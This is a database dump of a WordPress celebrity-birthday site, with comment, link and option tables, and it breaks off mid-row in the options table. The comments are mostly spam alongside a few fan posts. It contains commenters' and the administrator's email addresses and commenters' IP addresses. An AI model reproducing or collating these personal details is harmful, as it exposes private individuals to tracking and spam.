-- MariaDB dump 10.19 Distrib 10.6.16-MariaDB, for Linux (x86_64)
--
-- Host: localhost Database: birthday_bp
-- ------------------------------------------------------
-- Server version 10.6.16-MariaDB
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;
--
-- Table structure for table `wp_commentmeta`
--
DROP TABLE IF EXISTS `wp_commentmeta`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_commentmeta` (
`meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`comment_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`meta_key` varchar(255) DEFAULT NULL,
`meta_value` longtext DEFAULT NULL,
PRIMARY KEY (`meta_id`),
KEY `comment_id` (`comment_id`),
KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=117 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_commentmeta`
--
LOCK TABLES `wp_commentmeta` WRITE;
/*!40000 ALTER TABLE `wp_commentmeta` DISABLE KEYS */;
INSERT INTO `wp_commentmeta` VALUES (5,6,'ipcountry','CN'),(17,10,'ipcountry','CN'),(18,11,'ipcountry','US'),(22,15,'ipcountry','US'),(24,17,'ipcountry','US'),(32,25,'ipcountry','US'),(49,15,'akismet_result','false'),(50,15,'akismet_history','a:3:{s:4:\"time\";d:1459220575.3877561092376708984375;s:5:\"event\";s:11:\"recheck-ham\";s:4:\"user\";s:13:\"birthdaypedia\";}'),(55,17,'akismet_result','false'),(56,17,'akismet_history','a:3:{s:4:\"time\";d:1459220575.8580090999603271484375;s:5:\"event\";s:11:\"recheck-ham\";s:4:\"user\";s:13:\"birthdaypedia\";}'),(79,25,'akismet_result','false'),(80,25,'akismet_history','a:3:{s:4:\"time\";d:1459220578.7582800388336181640625;s:5:\"event\";s:11:\"recheck-ham\";s:4:\"user\";s:13:\"birthdaypedia\";}'),(100,15,'akismet_history','a:3:{s:4:\"time\";d:1459220592.930984020233154296875;s:5:\"event\";s:11:\"recheck-ham\";s:4:\"user\";s:13:\"birthdaypedia\";}'),(102,17,'akismet_history','a:3:{s:4:\"time\";d:1459220593.01087188720703125;s:5:\"event\";s:11:\"recheck-ham\";s:4:\"user\";s:13:\"birthdaypedia\";}'),(104,25,'akismet_history','a:3:{s:4:\"time\";d:1459220593.08860301971435546875;s:5:\"event\";s:11:\"recheck-ham\";s:4:\"user\";s:13:\"birthdaypedia\";}'),(106,15,'akismet_history','a:3:{s:4:\"time\";d:1459220596.0267488956451416015625;s:5:\"event\";s:11:\"recheck-ham\";s:4:\"user\";s:13:\"birthdaypedia\";}'),(108,17,'akismet_history','a:3:{s:4:\"time\";d:1459220596.1020081043243408203125;s:5:\"event\";s:11:\"recheck-ham\";s:4:\"user\";s:13:\"birthdaypedia\";}'),(110,25,'akismet_history','a:3:{s:4:\"time\";d:1459220596.1805150508880615234375;s:5:\"event\";s:11:\"recheck-ham\";s:4:\"user\";s:13:\"birthdaypedia\";}'),(112,15,'akismet_history','a:3:{s:4:\"time\";d:1459220607.808353900909423828125;s:5:\"event\";s:11:\"recheck-ham\";s:4:\"user\";s:13:\"birthdaypedia\";}'),(114,17,'akismet_history','a:3:{s:4:\"time\";d:1459220607.8900339603424072265625;s:5:\"event\";s:11:\"recheck-ham\";s:4:\"user\";s:13:\"birthdaypedia\";}'),(116,25,'akismet_history','a:3:{s:4:\"time\";d:1459220607.9720399379730224609375;s:5:\"event\";s:11:\"recheck-ham\";s:4:\"user\";s:13:\"birthdaypedia\";}');
/*!40000 ALTER TABLE `wp_commentmeta` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_comments`
--
DROP TABLE IF EXISTS `wp_comments`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_comments` (
`comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT 0,
`comment_author` tinytext NOT NULL,
`comment_author_email` varchar(100) NOT NULL DEFAULT '',
`comment_author_url` varchar(200) NOT NULL DEFAULT '',
`comment_author_IP` varchar(100) NOT NULL DEFAULT '',
`comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`comment_content` text NOT NULL,
`comment_karma` int(11) NOT NULL DEFAULT 0,
`comment_approved` varchar(20) NOT NULL DEFAULT '1',
`comment_agent` varchar(255) NOT NULL DEFAULT '',
`comment_type` varchar(20) NOT NULL DEFAULT '',
`comment_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
`user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
PRIMARY KEY (`comment_ID`),
KEY `comment_post_ID` (`comment_post_ID`),
KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
KEY `comment_date_gmt` (`comment_date_gmt`),
KEY `comment_parent` (`comment_parent`),
KEY `comment_author_email` (`comment_author_email`(10))
) ENGINE=InnoDB AUTO_INCREMENT=26 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_comments`
--
LOCK TABLES `wp_comments` WRITE;
/*!40000 ALTER TABLE `wp_comments` DISABLE KEYS */;
INSERT INTO `wp_comments` VALUES (6,55,'oakley womens sunglasses','eqvyxada@gmail.com','http://shopping.oksunglasseswebsite.com/','112.111.185.94','2015-09-29 21:25:33','2015-09-29 21:25:33','Saved as a favorite, I really like your blog!',0,'1','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','',0,0),(10,236,'Oakley Sunglasses','obkaqrj@gmail.com','http://ok.cheap-sunglasses.us.com/','112.111.185.175','2015-10-10 09:59:26','2015-10-10 09:59:26','Saved as a favorite, I really like your blog!',0,'1','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','',0,0),(11,313,'Shezka Foxe','nia_bwell@hotmail.com','','96.228.17.62','2015-11-13 23:44:38','2015-11-13 23:44:38','He was truly a wonderful leader. It\'s sad the how his life ended tragically like that, but it\'s inspiring to see his teachings still live on even today. People still quote him all the time. He was truly a peace keeper, and people can still learn so much from him despite his passing. \r\n\r\nHappy Late Birthday Ghandi. You changed the world.',0,'1','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','',0,0),(15,505,'Shezka','nia_bwell@hotmail.com','','96.228.17.62','2015-12-16 21:16:23','2015-12-16 21:16:23','I\'m not a huge Kim Kardashian fan. Never have been, but I will say after reading up on Kim I feel the media misrepresents her. She really is an intelligent person when you get to the meat of it. Not to mention the struggles she\'s had to deal with in her personal life. She cares about her daughters and does venture out to try new career opportunities. A risk I don\'t think a lot of celebrities take these days due to their reputation, image, or what have you. \r\n\r\nShe does have my respect as a person. If I had to nitpick, I would say I feel her and her family are far to saturated in the media. There was a video circulating around youtube a while back (I can\'t recall if it was Kim in the video or not) where a producer was stating the name of a bunny owned by one of the Kardashians was not real news. \r\n\r\nRegardless, I do have to say Kim has certainly made herself known. The majority of people I know in my day to day life know who she and her family is without ever watching the reality show. That\'s a pretty big achievement.',0,'0','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36','',0,0),(17,236,'Psada.org','angelitaneudorf@bigstring.com','http://Psada.org/component/k2/author/72304','66.248.198.226','2016-01-02 05:03:02','2016-01-02 05:03:02','I have no idea of any softphone which has \"always on\" phone \r\nrecord where it records every call without consumer \r\ninput, However , I don\'t understand them all as I largely use Bria myself.',0,'0','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36','',0,0),(25,496,'private property impound software','martha.pie@googlemail.com','http://boinc.berkeley.edu/alpha/view_profile.php?userid=774208','172.245.107.9','2016-02-03 22:35:27','2016-02-03 22:35:27','Local officials estimate at least hundreds of members.\r\nThe reasl proprrty owner shall only appoint duhly authorized agents which have a direct connecton tto \r\nthe property (i. Barnett to have thhe charges dropped, ruling there was sufficient evidence \r\nto allow the matter to be presented to a jury.',0,'0','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5','',0,0);
/*!40000 ALTER TABLE `wp_comments` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_cup_cp_profiles`
--
DROP TABLE IF EXISTS `wp_cup_cp_profiles`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_cup_cp_profiles` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`c_title` blob NOT NULL,
`c_name` blob NOT NULL,
`c_avatar` text NOT NULL,
`c_email` varchar(250) NOT NULL,
`c_phone` varchar(250) NOT NULL,
`c_fax` varchar(250) NOT NULL,
`c_mobile` varchar(250) NOT NULL,
`c_website` text NOT NULL,
`c_about` blob NOT NULL,
`show_on_main_page` tinyint(1) NOT NULL DEFAULT 1,
`enable_map_marker` tinyint(1) NOT NULL DEFAULT 1,
`c_address` blob NOT NULL,
`c_latitude` varchar(250) NOT NULL,
`c_longitude` varchar(250) NOT NULL,
`c_shortcode` text NOT NULL,
`c_order` int(11) NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_cup_cp_profiles`
--
LOCK TABLES `wp_cup_cp_profiles` WRITE;
/*!40000 ALTER TABLE `wp_cup_cp_profiles` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_cup_cp_profiles` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_links`
--
DROP TABLE IF EXISTS `wp_links`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_links` (
`link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`link_url` varchar(255) NOT NULL DEFAULT '',
`link_name` varchar(255) NOT NULL DEFAULT '',
`link_image` varchar(255) NOT NULL DEFAULT '',
`link_target` varchar(25) NOT NULL DEFAULT '',
`link_description` varchar(255) NOT NULL DEFAULT '',
`link_visible` varchar(20) NOT NULL DEFAULT 'Y',
`link_owner` bigint(20) unsigned NOT NULL DEFAULT 1,
`link_rating` int(11) NOT NULL DEFAULT 0,
`link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`link_rel` varchar(255) NOT NULL DEFAULT '',
`link_notes` mediumtext NOT NULL,
`link_rss` varchar(255) NOT NULL DEFAULT '',
PRIMARY KEY (`link_id`),
KEY `link_visible` (`link_visible`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_links`
--
LOCK TABLES `wp_links` WRITE;
/*!40000 ALTER TABLE `wp_links` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_links` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_options`
--
DROP TABLE IF EXISTS `wp_options`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_options` (
`option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`option_name` varchar(191) DEFAULT NULL,
`option_value` longtext NOT NULL,
`autoload` varchar(20) NOT NULL DEFAULT 'yes',
PRIMARY KEY (`option_id`),
UNIQUE KEY `option_name` (`option_name`),
KEY `wpe_autoload_options_index` (`autoload`)
) ENGINE=InnoDB AUTO_INCREMENT=107823 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_options`
--
LOCK TABLES `wp_options` WRITE;
/*!40000 ALTER TABLE `wp_options` DISABLE KEYS */;
INSERT INTO `wp_options` VALUES (1,'siteurl','https://old.birthdaypedia.com','yes'),(2,'home','https://old.birthdaypedia.com','yes'),(3,'blogname','BirthdayPedia','yes'),(4,'blogdescription','Celebrity Birthday','yes'),(5,'users_can_register','0','yes'),(6,'admin_email','glowens@gmail.com','yes'),(7,'start_of_week','1','yes'),(8,'use_balanceTags','0','yes'),(9,'use_smilies','1','yes'),(10,'require_name_email','1','yes'),(11,'comments_notify','1','yes'),(12,'posts_per_rss','10','yes'),(13,'rss_use_excerpt','0','yes'),(14,'mailserver_url','mail.example.com','yes'),(15,'mailserver_login','login@example.com','yes'),(16,'mailserver_pass','password','yes'),(17,'mailserver_port','110','yes'),(18,'default_category','1','yes'),(19,'default_comment_status','open','yes'),(20,'default_ping_status','open','yes'),(21,'default_pingback_flag','0','yes'),(22,'posts_per_page','10','yes'),(23,'date_format','F j, Y','yes'),(24,'time_format','g:i a','yes'),(25,'links_updated_date_format','F j, Y g:i a','yes'),(26,'comment_moderation','0','yes'),(27,'moderation_notify','1','yes'),(28,'permalink_structure','/%postname%/','yes'),(30,'hack_file','0','yes'),(31,'blog_charset','UTF-8','yes'),(32,'moderation_keys','','no'),(33,'active_plugins','a:14:{i:0;s:53:\"accelerated-mobile-pages/accelerated-moblie-pages.php\";i:1;s:19:\"akismet/akismet.php\";i:2;s:47:\"better-search-replace/better-search-replace.php\";i:3;s:25:\"cloudflare/cloudflare.php\";i:4;s:36:\"contact-form-7/wp-contact-form-7.php\";i:5;s:46:\"facebook-comments-plugin/facebook-comments.php\";i:6;s:59:\"force-regenerate-thumbnails/force-regenerate-thumbnails.php\";i:7;s:27:\"js_composer/js_composer.php\";i:8;s:23:\"revslider/revslider.php\";i:9;s:37:\"td-mobile-plugin/td-mobile-plugin.php\";i:10;s:26:\"theia-post-slider/main.php\";i:11;s:37:\"tinymce-advanced/tinymce-advanced.php\";i:12;s:24:\"wordpress-seo/wp-seo.php\";i:13;s:26:\"wpengine-common/plugin.php\";}','yes'),(34,'category_base','','yes'),(35,'ping_sites','http://rpc.pingomatic.com/','yes'),(37,'comment_max_links','2','yes'),(38,'gmt_offset','0','yes'),(39,'default_email_category','1','yes'),(40,'recently_edited','a:5:{i:0;s:79:\"/nas/content/live/birthdaypedia/wp-content/themes/Newspaper/mobile/comments.php\";i:2;s:72:\"/nas/content/live/birthdaypedia/wp-content/themes/Newspaper/comments.php\";i:3;s:69:\"/nas/content/live/birthdaypedia/wp-content/themes/Newspaper/style.css\";i:4;s:70:\"/nas/content/live/birthdaypedia/wp-content/themes/Newspaper/footer.php\";i:5;s:73:\"/nas/content/live/birthdaypedia/wp-content/themes/Newspaper/functions.php\";}','no'),(41,'template','Newspaper','yes'),(42,'stylesheet','Newspaper','yes'),(43,'comment_whitelist','1','yes'),(44,'blacklist_keys','','no'),(45,'comment_registration','0','yes'),(46,'html_type','text/html','yes'),(47,'use_trackback','0','yes'),(48,'default_role','subscriber','yes'),(49,'db_version','38590','yes'),(50,'uploads_use_yearmonth_folders','1','yes'),(51,'upload_path','','yes'),(52,'blog_public','1','yes'),(53,'default_link_category','2','yes'),(54,'show_on_front','page','yes'),(55,'tag_base','','yes'),(56,'show_avatars','1','yes'),(57,'avatar_rating','G','yes'),(58,'upload_url_path','','yes'),(59,'thumbnail_size_w','150','yes'),(60,'thumbnail_size_h','150','yes'),(61,'thumbnail_crop','1','yes'),(62,'medium_size_w','300','yes'),(63,'medium_size_h','300','yes'),(64,'avatar_default','mystery','yes'),(65,'large_size_w','1024','yes'),(66,'large_size_h','1024','yes'),(67,'image_default_link_type','file','yes'),(68,'image_default_size','','yes'),(69,'image_default_align','','yes'),(70,'close_comments_for_old_posts','0','yes'),(71,'close_comments_days_old','14','yes'),(72,'thread_comments','1','yes'),(73,'thread_comments_depth','5','yes'),(74,'page_comments','0','yes'),(75,'comments_per_page','50','yes'),(76,'default_comments_page','newest','yes'),(77,'comment_order','asc','yes'),(78,'sticky_posts','a:0:{}','yes'),(79,'widget_categories','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(80,'widget_text','a:2:{i:5;a:3:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:369:\"<script type=\"text/javascript\" src=\"//s3.amazonaws.com/downloads.mailchimp.com/js/signup-forms/popup/embed.js\" data-dojo-config=\"usePlainJson: true, isDebug: false\"></script><script type=\"text/javascript\">require([\"mojo/signup-forms/Loader\"], function(L) { L.start({\"baseUrl\":\"mc.us11.list-manage.com\",\"uuid\":\"3baa0f159654151aa9a3db431\",\"lid\":\"d29e4323fe\"}) })</script>\";s:6:\"filter\";b:0;}s:12:\"_multiwidget\";i:1;}','yes'),(81,'widget_rss','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(82,'uninstall_plugins','a:0:{}','no'),(83,'timezone_string','','yes'),(84,'page_for_posts','0','yes'),(85,'page_on_front','20','yes'),(86,'default_post_format','0','yes'),(87,'link_manager_enabled','0','yes'),(88,'initial_db_version','30133','yes'),(89,'wp_user_roles','a:7:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:63:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:20:\"wpseo_manage_options\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:35:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:15:\"wpseo_bulk_edit\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:10:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:5:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}s:13:\"wpseo_manager\";a:2:{s:4:\"name\";s:11:\"SEO Manager\";s:12:\"capabilities\";a:37:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:28:\"wpseo_edit_advanced_metadata\";b:1;s:20:\"wpseo_manage_options\";b:1;}}s:12:\"wpseo_editor\";a:2:{s:4:\"name\";s:10:\"SEO Editor\";s:12:\"capabilities\";a:36:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:28:\"wpseo_edit_advanced_metadata\";b:1;}}}','yes'),(90,'widget_search','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(91,'widget_recent-posts','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(92,'widget_recent-comments','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(93,'widget_archives','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(94,'widget_meta','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(95,'sidebars_widgets','a:10:{s:19:\"wp_inactive_widgets\";a:1:{i:0;s:6:\"text-5\";}s:10:\"td-default\";a:3:{i:0;s:24:\"td_block_ad_box_widget-2\";i:1;s:19:\"td_block_4_widget-2\";i:2;s:24:\"td_block_ad_box_widget-3\";}s:11:\"td-footer-1\";a:0:{}s:11:\"td-footer-2\";a:0:{}s:11:\"td-footer-3\";a:0:{}s:19:\"ampforwp-above-loop\";a:0:{}s:19:\"ampforwp-below-loop\";a:0:{}s:21:\"ampforwp-below-header\";a:0:{}s:21:\"ampforwp-above-footer\";a:0:{}s:13:\"array_version\";i:3;}','yes'),(96,'db_upgraded','','yes'),(97,'cron','a:12:{i:1629438149;a:1:{s:34:\"wp_privacy_delete_old_export_files\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1629463228;a:1:{s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1629465088;a:1:{s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1629472028;a:1:{s:19:\"wpseo-reindex-links\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1629472086;a:1:{s:25:\"delete_expired_transients\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1629477129;a:1:{s:44:\"puc_cron_check_updates-wcp-theia-post-slider\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1629478158;a:1:{s:25:\"check_plugin_updates-main\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1629488160;a:1:{s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1629495947;a:1:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1629498707;a:1:{s:24:\"akismet_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1629603161;a:1:{s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}s:7:\"version\";i:2;}','yes'),(121,'_transient_random_seed','b879d236ba4210210fec6968971e7dbc','yes'),(124,'wpe_notices','a:2:{s:4:\"read\";s:0:\"\";s:8:\"messages\";a:0:{}}','yes'),(125,'wpe_notices_ttl','1516815728','yes'),(471,'theme_mods_twentyfifteen','a:2:{s:18:\"nav_menu_locations\";a:3:{s:11:\"header-menu\";s:2:\"34\";s:8:\"top-menu\";s:0:\"\";s:11:\"footer-menu\";s:3:\"378\";}s:16:\"sidebars_widgets\";a:2:{s:4:\"